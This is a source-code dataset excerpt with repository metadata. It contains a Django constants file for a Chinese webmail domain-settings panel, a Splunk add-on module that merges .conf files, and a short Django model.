] | 1 | 2021-06-10T20:45:55.000Z | 2021-06-10T20:45:55.000Z | linuxOperation/app/domain/constants.py | zhouli121018/core | f9700204349ecb22d45e700e9e27e79412829199 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
常量
'''
import base64
from django.utils.translation import ugettext_lazy as _
DOMAIN_BASIC_PARAMS = (
(u"cf_limit_mailbox_cnt", _(u"限定邮箱数量")),
#(u"cf_limit_alias_cnt", u"限定别名数量"), #这个开关没人用
(u"cf_limit_mailbox_size", _(u"限定邮箱空间总容量")),
(u"cf_limit_netdisk_size", _(u"限定网络硬盘总容量")),
(u"cf_limit_email_size", _(u"发送邮件限制大小")),
#(u"cf_limit_attach_size", u"WebMail单附件大小"), #新版webmail不需要这个按钮
(u"cf_def_mailbox_size", _(u"用户邮箱默认容量")),
(u"cf_def_netdisk_size", _(u"网络硬盘默认容量")),
)
DOMAIN_BASIC_PARAMS_VALUE = (
(u"cf_limit_mailbox_cnt", "8000"),
#(u"cf_limit_alias_cnt", "0"), #这个开关没人用
(u"cf_limit_mailbox_size", "0"),
(u"cf_limit_netdisk_size", "500"),
(u"cf_limit_email_size", "0"),
#(u"cf_limit_attach_size", "10"),
(u"cf_def_mailbox_size", "100"),
(u"cf_def_netdisk_size", "100"),
)
DOMAIN_BASIC_PARAMS_TYPE = (
(u"cf_limit_mailbox_cnt", "system"),
#(u"cf_limit_alias_cnt", "system"), #这个开关没人用
(u"cf_limit_mailbox_size", "system"),
(u"cf_limit_netdisk_size", "system"),
(u"cf_limit_email_size", "system"),
#(u"cf_limit_attach_size", "system"),
(u"cf_def_mailbox_size", "system"),
(u"cf_def_netdisk_size", "system"),
)
DOMAIN_BASIC_STATUS = (
(u"mailboxUsed", _(u"已分配邮箱")),
(u"aliasUsed", _(u"已分配别名")),
(u"spaceUsed", _(u"已分配邮箱空间")),
(u"netdiskUsed", _(u"已分配网盘空间")),
)
DOMAIN_REG_LOGIN_PARAMS = (
(u"sw_user_reg", _(u"用户申请邮箱功能")),
(u"sw_reg_ratify", _(u"管理员审核开通")),
#(u"sw_link_admin", u"管理员登陆链接显示在邮件系统登陆页"), #无语加无用的开关
(u"sw_welcome_letter", _(u"新用户欢迎信功能")),
(u"sw_agreement", _(u"新用户欢迎信功能")),
)
DOMAIN_REG_LOGIN_VALUE = (
(u"sw_user_reg", "-1"),
(u"sw_reg_ratify", "-1"),
#(u"sw_link_admin", "1"),
(u"sw_welcome_letter", "1"),
(u"sw_agreement", "1"),
)
DOMAIN_REG_LOGIN_TYPE = (
(u"sw_user_reg", "webmail"),
(u"sw_reg_ratify", "webmail"),
#(u"sw_link_admin", "webmail"),
(u"sw_welcome_letter", "system"),
(u"sw_agreement", "webmail"),
)
DOMAIN_REG_LOGIN_WELCOME_PARAMS = (
(u"cf_welcome_letter", _(u"欢迎信内容")),
)
DOMAIN_REG_LOGIN_WELCOME_VALUE = (
(u"cf_welcome_letter", ""),
)
DOMAIN_REG_LOGIN_WELCOME_TYPE = (
(u"cf_welcome_letter", "system"),
)
DOMAIN_REG_LOGIN_AGREE_PARAMS = (
(u"cf_agreement", _(u"用户注册协议")),
)
DOMAIN_REG_LOGIN_AGREE_VALUE = (
(u"cf_agreement", ""),
)
DOMAIN_REG_LOGIN_AGREE_TYPE = (
(u"cf_agreement", "webmail"),
)
DOMAIN_SYS_RECV_PARAMS = (
(u"limit_send", _(u"发信功能限制")),
(u"limit_recv", _(u"收信功能限制")),
(u"limit_pop", _(u"POP/POPS邮箱收取功能")),
(u"limit_imap", _(u"IMAP/IMAPS客户端邮件收发功能")),
(u"limit_smtp", _(u"SMTP/SMTPS客户端邮件发送功能")),
)
DOMAIN_SYS_RECV_VALUE = (
(u"limit_send", u"-1"),
(u"limit_recv", u"-1"),
(u"limit_pop", u"-1"),
(u"limit_imap", u"-1"),
(u"limit_smtp", u"-1"),
)
DOMAIN_SYS_RECV_TYPE = (
(u"limit_send", u"system"),
(u"limit_recv", u"system"),
(u"limit_pop", u"system"),
(u"limit_imap", u"system"),
(u"limit_smtp", u"system"),
)
DOMAIN_SYS_SECURITY_PARAMS = (
(u"sw_def_login_limit_mail", _(u"开启修改密码通知信")),
(u"cf_def_safe_login", _(u"安全登录限制")),
(u"cf_ip_limit", _(u"登陆IP限制")),
)
DOMAIN_SYS_SECURITY_VALUE = (
(u"sw_def_login_limit_mail", u"1"),
(u"cf_def_safe_login", u""),
(u"cf_ip_limit", u""),
)
DOMAIN_SYS_SECURITY_TYPE = (
(u"sw_def_login_limit_mail", u"system"),
(u"cf_def_safe_login", u"webmail"),
(u"cf_ip_limit", u"webmail"),
)
DOMAIN_SYS_SECURITY_PWD_PARAMS = (
(u"cf_def_login_limit_mail", _(u"修改密码通知信")),
)
DOMAIN_SYS_SECURITY_PWD_VALUES = (
(u"cf_def_login_limit_mail", u""),
)
DOMAIN_SYS_SECURITY_PWD_TYPE = (
(u"cf_def_login_limit_mail", u"system"),
)
DOMAIN_SYS_PASSWORD_PARAMS = (
(u"sw_pwdtimeout", _(u"定期密码修改设置")),
(u"cf_pwd_days", _(u"密码有效期间")),
#(u"cf_first_change_pwd", u"首次登录修改密码"),
(u"cf_pwd_type", _(u"密码组成字符种类")),
(u"cf_pwd_rule", _(u"其他密码规则设置")),
(u"cf_pwd_forbid", _(u"用户密码强度低于规则设置")),
)
DOMAIN_SYS_PASSWORD_VALUE = (
(u"sw_pwd_timeout", u"1"),
(u"cf_pwd_days", u"365"),
#(u"cf_first_change_pwd", u"-1"),
(u"cf_pwd_type", u"-1"),
(u"cf_pwd_rule", u""),
(u"cf_pwd_forbid", u""),
)
DOMAIN_SYS_PASSWORD_TYPE = (
(u"sw_pwd_timeout", u"system"),
(u"cf_pwd_days", u"system"),
#(u"cf_first_change_pwd", u"system"),
(u"cf_pwd_type", u"system"),
(u"cf_pwd_rule", u"system"),
(u"cf_pwd_forbid", u"system"),
)
#密码组成字符种类
DOMAIN_SYS_PASSWORD_TYPE_LIMIT = (
(u"-1", _(u"必须包含两种字符")),
(u"1", _(u"必须包含三种字符")),
(u"2", _(u"必须包含四种字符")),
)
#其他密码规则设置
DOMAIN_SYS_PASSWORD_RULE_VALUE = (
#(u"pwdLen", u"passwd_size"), >= 2.2.59 后强制开启
(u"pwdLenValue", u"passwd_size2"),
(u"pwdNoAcct", u"passwd_name"),
(u"pwdNumLimit", u"passwd_digital"),
(u"pwdWordLimit", u"passwd_letter"),
(u"pwdFlagLimit", u"passwd_letter2"),
(u"pwdNoName", u"passwd_name2"),
)
#密码低于规则强度时操作
DOMAIN_SYS_PASSWORD_FORBID_RULE = (
(u"pwdLimitForbidSend", u"forbid_send"),
(u"pwdLimitForceChange", u"force_change"),
(u"pwdLimitForbidSendInWeak", u"forbid_send_in_weak"),
(u"pwdLimitForceChangeInWeak", u"force_change_in_weak"),
)
DOMAIN_SYS_PASSWORD_FORBID_RULE_DEFAULT = (
(u"forbid_send", u"-1"),
(u"force_change", u"-1"),
(u"forbid_send_in_weak", u"1"),
(u"force_change_in_weak", u"1"),
)
DOMAIN_SYS_PASSWORD_LEN_LIMIT = tuple([u"{}".format(v) for v in range(8,17)])
DOMAIN_SYS_PASSWORD_RULE_LIMIT = (
#是否限制密码长度
#(u"passwd_size", u"1"),
#密码长度的值
(u"passwd_size2", u"8"),
#密码不能包含账号
(u"passwd_name", u"1"),
#连续3位及以上数字不能连号
(u"passwd_digital", u"1"),
#连续3位及以上字母不能连号
(u"passwd_letter", u"1"),
#密码不能包含连续3个及以上相同字符
(u"passwd_letter2", u"1"),
#密码不能包含用户姓名大小写全拼
(u"passwd_name2", u"1"),
)
DOMAIN_SYS_INTERFACE_PARAMS = (
(u"sw_auth_api", _(u"第三方登录验证")),
(u"sw_api_pwd_encry", _(u"接口修改密码是否加密")),
(u"sw_impush", _(u"即时通讯软件集成")),
(u"sw_xss_token", _(u"登录防止xss启用token验证")),
)
DOMAIN_SYS_INTERFACE_VALUE = (
(u"sw_auth_api", u"-1"),
(u"sw_api_pwd_encry", u"-1"),
(u"sw_impush", u"-1"),
(u"sw_xss_token", u"-1"),
)
DOMAIN_SYS_INTERFACE_TYPE = (
(u"sw_auth_api", u"webmail"),
(u"sw_api_pwd_encry", u"webmail"),
(u"sw_impush", u"webmail"),
(u"sw_xss_token", u"webmail"),
)
DOMAIN_SYS_INTERFACE_AUTH_API_PARAMS = (
(u"cf_auth_api", _(u"第三方登录验证")),
)
DOMAIN_SYS_INTERFACE_AUTH_API_VALUE = (
(u"cf_auth_api", u""),
)
DOMAIN_SYS_INTERFACE_AUTH_API_TYPE = (
(u"cf_auth_api", u"webmail"),
)
DOMAIN_SYS_INTERFACE_IM_API_PARAMS = (
(u"cf_impush_api", _(u"即时通讯软件集成")),
)
DOMAIN_SYS_INTERFACE_IM_API_VALUE = (
(u"cf_impush_api", u""),
)
DOMAIN_SYS_INTERFACE_IM_API_TYPE = (
(u"cf_impush_api", u"webmail"),
)
DOMAIN_SYS_OTHERS_PARAMS = (
#(u"sw_size_limit_recv", u"邮箱容量满后拒绝接收邮件"), 这个开关没意义,去掉了
(u"sw_auto_clean", _(u"邮箱空间定时清理功能")),
(u"sw_online_attach_switch", _(u"客户端网络附件开关")),
#(u"sw_auto_inbox", u"登录默认打开收件箱"),
(u"sw_filter_duplicate_mail", _(u"收件时是否过滤重复邮件")),
#这个开关没有意义,应该作为通用设置存在
(u"sw_display_list", _(u"邮件列表发来邮件显示邮件列表名称")),
(u"sw_user_reg", _(u"用户申请邮箱功能")),
#(u"sw_reg_ratify", _(u"管理员审核开通")),
(u"sw_welcome_letter", _(u"新用户欢迎信功能")),
(u"sw_agreement", _(u"新用户欢迎信功能")),
(u"sw_recvsms", _(u"短信通知接收邮件")),
(u"sw_sendsms", _(u"短信通知发送邮件")),
(u"cf_sms_conf", _(u"短信模块设置")),
)
DOMAIN_SYS_OTHERS_VALUE = (
#(u"sw_size_limit_recv", u"1"),
(u"sw_auto_clean", u"1"),
(u"sw_online_attach_switch", u"-1"),
#(u"sw_auto_inbox", u"1"),
(u"sw_filter_duplicate_mail", u"1"),
(u"sw_display_list", u"1"),
(u"sw_user_reg", "-1"),
#(u"sw_reg_ratify", "-1"),
(u"sw_welcome_letter", "1"),
(u"sw_agreement", "1"),
(u"sw_recvsms", u"-1"),
(u"sw_sendsms", u"-1"),
(u"cf_sms_conf", u""),
)
DOMAIN_SYS_OTHERS_TYPE = (
#(u"sw_size_limit_recv", u"system"),
(u"sw_auto_clean", u"webmail"),
(u"sw_online_attach_switch", u"system"),
#(u"sw_auto_inbox", u"webmail"),
(u"sw_filter_duplicate_mail", u"webmail"),
(u"sw_display_list", u"webmail"),
(u"sw_user_reg", "webmail"),
#(u"sw_reg_ratify", "webmail"),
(u"sw_welcome_letter", "system"),
(u"sw_agreement", "webmail"),
(u"sw_recvsms", u"webmail"),
(u"sw_sendsms", u"webmail"),
(u"cf_sms_conf", u"system"),
)
DOMAIN_SYS_OTHERS_SPACE_PARAMS = (
(u"cf_spaceclean", _(u"邮箱空间清理")),
(u"cf_spacemail", _(u"邮箱空间清理")),
)
DOMAIN_SYS_OTHERS_SPACE_VALUE = (
(u"cf_spaceclean", u""),
(u"cf_spacemail", u""),
)
DOMAIN_SYS_OTHERS_SPACE_TYPE = (
(u"cf_spaceclean", u"system"),
(u"cf_spacemail", u"system"),
)
DOMAIN_SYS_OTHERS_ATTACH_PARAMS = (
(u"cf_online_attach", _(u"客户端网络附件")),
)
DOMAIN_SYS_OTHERS_ATTACH_VALUE = (
(u"cf_online_attach", u""),
)
DOMAIN_SYS_OTHERS_ATTACH_TYPE = (
(u"cf_online_attach", u"system"),
)
DOMAIN_SIGN_PARAMS = (
(u'cf_domain_signature',_(u'域签名')),
(u'sw_domain_signature',_(u'域签名开关')),
)
DOMAIN_SIGN_VALUE = (
(u'cf_domain_signature',u''),
(u'sw_domain_signature',u'-1'),
)
DOMAIN_SIGN_TYPE = (
(u'cf_domain_signature',u'system'),
(u'sw_domain_signature',u'system'),
)
DOMAIN_SIGN_PERSONAL_PARAMS = (
(u'cf_personal_sign',_(u'个人签名模板')),
)
DOMAIN_SIGN_PERSONAL_VALUE = (
(u'cf_personal_sign',u''),
)
DOMAIN_SIGN_PERSONAL_TYPE = (
(u'cf_personal_sign',u'webmail'),
)
# ------个人签名 的输入参数 --------
DOMAIN_PERSONAL_DEFAULT_CODE = """<p><span style="font-size:16px;"><strong>{NAME} [<span style="font-size:14px;">{POSITION}</span>]{DEPARTMENT}<br /></strong></span></p><p><span style="white-space:normal;font-size:16px;"><strong>{TELEPHONE}</strong></span></p><p><br /><strong></strong></p><p><span style="font-size:14px;_(u"><strong>这里填公司名称<br /></strong></span></p><p>地址:这里填公司地址</p><p>电话:<span style=")white-space:normal;_(u">{WORKPHONE} 传真:这里填传真号码 邮箱:{EMAIL}<br /></span></p><br /><p><span style=")white-space:normal;"><br /></span></p>"""
DOMAIN_PERSONAL_DEFAULT_CODE=base64.encodestring(DOMAIN_PERSONAL_DEFAULT_CODE)
DOMAIN_PERSONAL_DEFAULT_CODE=u"{}".format(DOMAIN_PERSONAL_DEFAULT_CODE)
DOMAIN_SIGN_PERSONAL_VALUE_DEFAULT = (
(u'personal_sign_new',u'-1'),
(u'personal_sign_forward',u'-1'),
(u'personal_sign_auto',u'1'),
(u'personal_sign_templ',DOMAIN_PERSONAL_DEFAULT_CODE),
)
DOMAIN_MODULE_HOME_PARAMS = (
#(u'sw_business_tools', u'商务小工具栏目'), 新版本webmail去掉
#(u'sw_wgt_cale', u'万年历'),
#(u'sw_wgt_calc', u'万用计算器'),
#(u'sw_wgt_maps', u'城市地图'),
#(u'sw_email_used_see', u'用户已用邮箱容量查看功能'),
#(u'sw_weather', u'天气预报功能'),
#(u'sw_oab', u'企业通讯录'),
#(u'sw_department_openall', u'企业通讯录域组合'),
#(u'sw_dept_showall', u'父部门中是否显示子部门邮件账号'),
#(u'sw_netdisk', u'网络硬盘功能'),
#(u'sw_calendar', u'日程功能'),
#(u'sw_notes', u'便签功能'),
)
DOMAIN_MODULE_HOME_VALUE = (
#(u'sw_business_tools', u'1'),
#(u'sw_wgt_cale', u'1'),
#(u'sw_wgt_calc', u'1'),
#(u'sw_wgt_maps', u'1'),
#(u'sw_email_used_see', u'1'), #邮箱容量查看功能,这开关去掉
#(u'sw_weather', u'1'),
#(u'sw_oab', u'1'),
#(u'sw_department_openall', u'1'),
#(u'sw_dept_showall', u'1'),
#(u'sw_netdisk', u'1'),
#(u'sw_calendar', u'1'),
#(u'sw_notes', u'1'),
)
DOMAIN_MODULE_HOME_TYPE = (
#(u'sw_business_tools', u'webmail'),
#(u'sw_wgt_cale', u'webmail'),
#(u'sw_wgt_calc', u'webmail'),
#(u'sw_wgt_maps', u'webmail'),
#(u'sw_email_used_see', u'webmail'),
#(u'sw_weather', u'webmail'),
#(u'sw_oab', u'webmail'),
#(u'sw_department_openall', u'webmail'),
#(u'sw_dept_showall', u'webmail'),
#(u'sw_netdisk', u'webmail'),
#(u'sw_calendar', u'webmail'),
#(u'sw_notes', u'webmail'),
)
DOMAIN_MODULE_MAIL_PARAMS = (
#(u'sw_drafts', u'保存草稿功能'),
#(u'sw_mail_encryption', u'发送邮件显示加密选项'),
#(u'sw_show_add_paper', u'显示地址簿和信纸模块'),
#(u'sw_mailpaper', u'去掉信纸模块'),
#(u'sw_auto_receipt', u'自动发送回执功能'), 这个开关在新版没什么意义
(u'sw_mail_in_reply_to', _(u'添加Reply-To到邮件头')),
(u'sw_mail_recall_notify', _(u'邮件召回成功后提示收件人')),
(u'sw_save_client_sent_email', _(u'保存客户端已发送邮件')),
(u'sw_oab_dumpbutton', _(u'通讯录导出按钮开关')),
(u'oab_show_mod', _(u'企业通讯录设置')), #新版webmail使用
(u'sw_oab_share', _(u'其他域通讯录共享')),
(u'sw_cab', _(u'公共通讯录')),
)
DOMAIN_MODULE_MAIL_VALUE = (
#(u'sw_drafts', u'1'),
#(u'sw_mail_encryption', u'-1'),
#(u'sw_show_add_paper', u'-1'),
#(u'sw_mailpaper', u'-1'),
#(u'sw_auto_receipt', u'1'),
(u'sw_mail_in_reply_to', u'1'),
(u'sw_mail_recall_notify', u'1'),
(u'sw_save_client_sent_email', u'-1'),
(u'sw_oab_dumpbutton', u'1'),
(u'oab_show_mod', u'1'),
(u'sw_oab_share', u'1'),
(u'sw_cab', u'1'),
)
DOMAIN_MODULE_MAIL_TYPE = (
#(u'sw_drafts', u'webmail'),
#(u'sw_mail_encryption', u'webmail'),
#(u'sw_show_add_paper', u'webmail'),
#(u'sw_mailpaper', u'webmail'),
#(u'sw_auto_receipt', u'webmail'),
(u'sw_mail_in_reply_to', u'webmail'),
(u'sw_mail_recall_notify', u'webmail'),
(u'sw_save_client_sent_email', u'webmail'),
(u'sw_oab_dumpbutton', u'webmail'),#是否显示通讯录导出按钮
(u'oab_show_mod', u'webmail'), # JSON, 显示所有部门 等按钮设置
(u'sw_oab_share', u'webmail'),
(u'sw_cab', u'webmail'),
)
DOMAIN_MODULE_SET_PARAMS = (
#(u'sw_change_userinfo', u'个人资料功能'),
(u'sw_change_pass', _(u'密码修改功能')),
#(u'sw_options', u'参数设置功能'),
#(u'sw_signature', u'邮件签名功能'),
#(u'sw_auto_reply', u'自动回复功能'),
#(u'sw_auto_forward', u'自动转发功能'),
#(u'sys_userbwlist', u'黑白名单功能'),
#(u'sw_autoforward_visible', u'设置自动转发默认值'),
(u'sw_mailboxmove', _(u'邮箱搬家功能')),
(u'sw_feedback', _(u'邮箱意见反馈功能')),
(u'sw_zhaohui', _(u'邮件召回记录查看')),
(u'sw_cfilter', _(u'邮件过滤功能')),
(u'sw_smtptransfer_visible', _(u'SMTP外发邮件代理')),
(u'sw_realaddress_alert', _(u'代发邮件地址提醒')),
(u'sw_time_mode', _(u'邮件内容中时间显示')),
)
DOMAIN_MODULE_SET_VALUE = (
#(u'sw_change_userinfo', u'1'),
(u'sw_change_pass', u'1'),
#(u'sw_options', u'1'),
#(u'sw_signature', u'1'),
#(u'sw_auto_reply', u'1'),
#(u'sw_auto_forward', u'1'),
#(u'userbwlist', u'黑白名单功能'),
#(u'sw_autoforward_visible', u'1'),
(u'sw_mailboxmove', u'1'),
(u'sw_feedback', u'1'),
(u'sw_zhaohui', u'1'),
(u'sw_cfilter', u'1'),
(u'sw_smtptransfer_visible', u'-1'),
(u'sw_realaddress_alert', u'1'),
(u'sw_time_mode', u'-1'),
)
DOMAIN_MODULE_SET_TYPE = (
#(u'sw_change_userinfo', u'webmail'),
(u'sw_change_pass', u'webmail'),
#(u'sw_options', u'webmail'),
#(u'sw_signature', u'webmail'),
#(u'sw_auto_reply', u'webmail'),
#(u'sw_auto_forward', u'webmail'),
#(u'userbwlist', u'-1'),
#(u'sw_autoforward_visible', u'webmail'),
(u'sw_mailboxmove', u'webmail'),
(u'sw_feedback', u'webmail'),
(u'sw_zhaohui', u'webmail'),
(u'sw_cfilter', u'webmail'),
(u'sw_smtptransfer_visible', u'webmail'),
(u'sw_realaddress_alert', u'webmail'),
(u'sw_time_mode', u'webmail'),
)
DOMAIN_MODULE_OTHER_PARAMS = (
#(u'sw_folder_clean', u'清空文件夹功能'),
#(u'sw_user_score', u'用户积分功能'),
#部门邮件列表 这个开关毫无存在意义
#(u'sw_dept_maillist', u'部门邮件列表'),
)
DOMAIN_MODULE_OTHER_VALUE = (
#(u'sw_folder_clean', u'-1'),
#(u'sw_user_score', u'1'),
#(u'sw_dept_maillist', u'-1'),
)
DOMAIN_MODULE_OTHER_TYPE = (
#(u'sw_folder_clean', u'webmail'),
#(u'sw_user_score', u'webmail'),
#(u'sw_dept_maillist', u'webmail'),
)
DOMAIN_SECRET_GRADE_1 = u'0' #秘密
DOMAIN_SECRET_GRADE_2 = u'1' #机密
DOMAIN_SECRET_GRADE_3 = u'2' #绝密
DOMAIN_SECRET_GRADE_ALL = (
(DOMAIN_SECRET_GRADE_1, _(u"秘密")),
(DOMAIN_SECRET_GRADE_2, _(u"机密")),
(DOMAIN_SECRET_GRADE_3, _(u"绝密")),
)
DOMAIN_PUBLIC_GENDER_CHOICES = (
(u'M',_(u'男')),
(u'F',_(u'女')),
)
DOMAIN_LIST_PARAMS = (
(u"cf_limit_mailbox_cnt", _(u"限定邮箱数量")),
(u"cf_limit_mailbox_size", _(u"限定邮箱空间总容量")),
(u"cf_limit_netdisk_size", _(u"限定网络硬盘总容量")),
(u"cf_limit_email_size", _(u"发送邮件限制大小")),
#(u"cf_limit_attach_size", u"WebMail单附件大小"),
(u"cf_def_mailbox_size", _(u"用户邮箱默认容量")),
(u"cf_def_netdisk_size", _(u"网络硬盘默认容量")),
(u"limit_send", _(u"发信功能限制")),
(u"limit_recv", _(u"收信功能限制")),
)
DOMAIN_LIST_PARAMS_VALUE = (
(u"cf_limit_mailbox_cnt", u"8000"),
(u"cf_limit_mailbox_size", u"0"),
(u"cf_limit_netdisk_size", u"500"),
(u"cf_limit_email_size", u"0"),
#(u"cf_limit_attach_size", u"10"),
(u"cf_def_mailbox_size", u"100"),
(u"cf_def_netdisk_size", u"100"),
(u"limit_send", u"-1"),
(u"limit_recv", u"-1"),
)
DOMAIN_LIST_PARAMS_TYPE = (
(u"cf_limit_mailbox_cnt", u"system"),
(u"cf_limit_mailbox_size", u"system"),
(u"cf_limit_netdisk_size", u"system"),
(u"cf_limit_email_size", u"system"),
#(u"cf_limit_attach_size", u"system"),
(u"cf_def_mailbox_size", u"system"),
(u"cf_def_netdisk_size", u"system"),
(u"limit_send", u"system"),
(u"limit_recv", u"system"),
)
DOMAIN_WEB_BASIC_PARAMS = (
(u"cf_title", _(u"页面标题")),
(u"cf_login_page", _(u"登录页面自动输入域名")),
(u"sw_icp_show", _(u"ICP 备案是否显示")),
(u"cf_icp_number", _(u"ICP 备案号")),
(u"cf_icp_url", _(u"ICP 备案链接地址")),
(u"cf_faq_url", _(u"帮助文件地址")),
(u"sw_unique_login", _(u"登录系统地点限制")),
#(u"sw_login_captcha_error_num", u"启用验证码功能"),
(u"cf_logout_url", _(u"登出跳转地址")),
(u"sw_login_ssl", _(u"SSL访问")),
)
DOMAIN_WEB_BASIC_VALUE = (
(u"cf_title", u""),
(u"cf_login_page", u"default"),
(u"sw_icp_show", u"-1"),
(u"cf_icp_number", u""),
(u"cf_icp_url", u""),
(u"cf_faq_url", u"http://www.comingchina.com/html/faq/"),
(u"sw_unique_login", u"-1"),
#(u"sw_login_captcha_error_num", u"-1"),
(u"cf_logout_url", u""),
(u"sw_login_ssl", u"-1"),
)
DOMAIN_WEB_BASIC_TYPE = (
(u"cf_title", u"webmail"),
(u"cf_login_page", u"webmail"),
(u"sw_icp_show", u"webmail"),
(u"cf_icp_number", u"webmail"),
(u"cf_icp_url", u"webmail"),
(u"cf_faq_url", u"webmail"),
(u"sw_unique_login", u"webmail"),
(u"sw_login_ssl", u"webmail"),
#(u"sw_login_captcha_error_num", u"webmail"),
(u"cf_logout_url", u"webmail"),
)
DOMAIN_WEB_ANOUNCE_PARAMS = (
(u"cf_announce_set", _(u"设置系统公告")),
(u"cf_announce", _(u"系统公告")),
)
DOMAIN_WEB_ANOUNCE_VALUE = (
(u"cf_announce_set", u""),
(u"cf_announce", u""),
)
DOMAIN_WEB_ANOUNCE_YPE = (
(u"cf_announce_set", u"webmail"),
(u"cf_announce", u"webmail"),
)
DOMAIN_LOGO_PARAMS = (
(u"cf_webmail_logo", _(u"Webmail Logo 设置")),
(u"cf_login_logo", _(u"登录页面 Logo 设置")),
)
DOMAIN_LOGO_VALUE = (
(u"cf_webmail_logo", u""),
(u"cf_login_logo", u""),
)
DOMAIN_LOGO_TYPE = (
(u"cf_webmail_logo", u"webmail"),
(u"cf_login_logo", u"webmail"),
)
DOMAIN_LOGIN_TEMP_LIST = (
(u"default", _(u"默认")),
(u"manual", _(u"手动域名")),
(u"adlogin", _(u"广告风格")),
(u"gao", _(u"大气管理员")),
(u"test", _(u"轮播图")),
(u"center", _(u"登录框居中")),
(u"sanya", _(u"背景图风格")),
)
DOMAIN_WEB_AD_PARAMS = (
#(u"cf_adsetting", u"页面广告设置"), #老版本webmail
(u"cf_adsetting2", _(u"页面广告设置")), #新版本webmail
)
DOMAIN_WEB_AD_VALUE = (
(u"cf_adsetting2", u""),
)
DOMAIN_WEB_AD_TYPE = (
(u"cf_adsetting2", u"webmail"),
)
DOMAIN_WEB_LINK_PARAMS = (
#(u"cf_webmail_link", u"首页链接设置"), #老版本webmail
(u"cf_webmail_link2", _(u"首页链接设置")), #新版本webmail
)
DOMAIN_WEB_LINK_VALUE = (
(u"cf_webmail_link2", u""),
)
DOMAIN_WEB_LINK_TYPE = (
(u"cf_webmail_link2", u"webmail"),
)
| 28.107884 | 566 | 0.602057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14,909 | 0.65065 |
eab2e9ef32b15fbfe01bae24b376302a8a7522ba | 3,924 | py | Python | splunk_add_on_ucc_framework/modular_alert_builder/build_core/alert_actions_merge.py | livehybrid/addonfactory-ucc-generator | 421c4f9cfb279f02fa8927cc7cf21f4ce48e7af5 | [
"Apache-2.0"
] | null | null | null | splunk_add_on_ucc_framework/modular_alert_builder/build_core/alert_actions_merge.py | livehybrid/addonfactory-ucc-generator | 421c4f9cfb279f02fa8927cc7cf21f4ce48e7af5 | [
"Apache-2.0"
] | null | null | null | splunk_add_on_ucc_framework/modular_alert_builder/build_core/alert_actions_merge.py | livehybrid/addonfactory-ucc-generator | 421c4f9cfb279f02fa8927cc7cf21f4ce48e7af5 | [
"Apache-2.0"
] | null | null | null | # SPDX-FileCopyrightText: 2020 2020
#
# SPDX-License-Identifier: Apache-2.0
from __future__ import absolute_import
import os
import os.path as op
from os.path import dirname as dn
from os.path import basename as bn
from shutil import copy
from . import alert_actions_exceptions as aae
from . import arf_consts as ac
from splunk_add_on_ucc_framework.alert_utils.alert_utils_common.conf_parser import TABConfigParser
merge_deny_list = ['default.meta', 'README.txt']
merge_mode_config = {
"app.conf": "item_overwrite"
}
def remove_alert_from_conf_file(alert, conf_file, logger):
if not alert or not conf_file:
logger.info('alert="%s", conf_file="%s"', alert, conf_file)
return
if not isinstance(alert, dict):
msg = 'alert="{}", event="alert is not a dict, don\'t remove anything form file {}"'.format(alert, conf_file)
raise aae.AlertCleaningFormatFailure(msg)
parser = TABConfigParser()
parser.read(conf_file)
conf_dict = parser.item_dict()
for stanza, key_values in list(conf_dict.items()):
if stanza == alert[ac.SHORT_NAME] or \
stanza == alert[ac.SHORT_NAME] + "_modaction_result" or \
stanza == "eventtype=" + alert[ac.SHORT_NAME] + "_modaction_result":
logger.info('alert="%s", conf_file="%s", stanza="%s"',
alert[ac.SHORT_NAME],
conf_file, stanza)
parser.remove_section(stanza)
with open(conf_file, "w") as cf:
parser.write(cf)
def merge_conf_file(src_file, dst_file, merge_mode="stanza_overwrite"):
if not os.path.isfile(src_file):
return
if not os.path.isfile(dst_file):
return
if bn(src_file) in merge_deny_list:
return
sparser = TABConfigParser()
sparser.read(src_file)
src_dict = sparser.item_dict()
parser = TABConfigParser()
parser.read(dst_file)
dst_dict = parser.item_dict()
if merge_mode == "stanza_overwrite":
for stanza, key_values in list(src_dict.items()):
if stanza not in dst_dict:
parser.add_section(stanza)
else:
parser.remove_section(stanza,false)
parser.add_section(stanza)
for k, v in list(key_values.items()):
parser.set(stanza, k, v)
elif merge_mode == "item_overwrite":
for stanza, key_values in list(src_dict.items()):
if stanza not in dst_dict:
parser.add_section(stanza)
for k, v in list(key_values.items()):
if v:
parser.set(stanza, k, v)
else:
parser.remove_option(stanza, k)
else:
# overwrit the whole file
parser.read(src_file)
with open(dst_file, "w") as df:
parser.write(df)
def merge(src, dst, no_deny_list=True):
if op.isfile(src):
return
src_files = os.listdir(src)
dst_files = os.listdir(dst)
merge_mode = "stanza_overwrite"
for file in src_files:
f_path = op.join(src, file)
if op.isfile(f_path):
if no_deny_list and file in merge_deny_list:
continue
if file.endswith("pyo") or file.endswith("pyc"):
continue
if file in dst_files and (file.endswith('.conf') or file.endswith('.conf.spec')):
if file in list(merge_mode_config.keys()):
merge_mode = merge_mode_config[file]
merge_conf_file(f_path, op.join(dst, file), merge_mode)
else:
copy(f_path, dst)
elif op.isdir(f_path):
if file.startswith('.'):
continue
if file not in dst_files:
os.makedirs(op.join(dst, file))
merge(f_path, op.join(dst, file))
else:
raise Exception("Unsupported file type {}".format(f_path))
| 32.429752 | 117 | 0.605759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 481 | 0.122579 |
eab304e0038f9d90c7298134d0344c832dc999c1 | 226 | py | Python | authapp/models.py | MSFC-NASA/NasaPD | 5851b63f57d2820f48f579bf71ffa040c23b755e | [
"MIT"
] | null | null | null | authapp/models.py | MSFC-NASA/NasaPD | 5851b63f57d2820f48f579bf71ffa040c23b755e | [
"MIT"
] | null | null | null | authapp/models.py | MSFC-NASA/NasaPD | 5851b63f57d2820f48f579bf71ffa040c23b755e | [
"MIT"
] | 2 | 2021-03-19T16:40:52.000Z | 2021-03-20T13:01:41.000Z | from django.db import models
from django.conf import settings
# Create your models here.
class UserRegistrationModel(models.Model):
user = models.OneToOneField(
settings.AUTH_USER_MODEL, on_delete=models.CASCADE) | 28.25 | 59 | 0.783186 | 135 | 0.597345 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.115044 |
eab3229dfe3d73f0452d4072e97aba518169d2d1 | 2,499 | py | Python | src/commercetools/predicates.py | mikedingjan/commercetools-python-sdk | 95caec9e72017114c4536e63e19f5283754a3871 | [
"MIT"
] | null | null | null | src/commercetools/predicates.py | mikedingjan/commercetools-python-sdk | 95caec9e72017114c4536e63e19f5283754a3871 | [
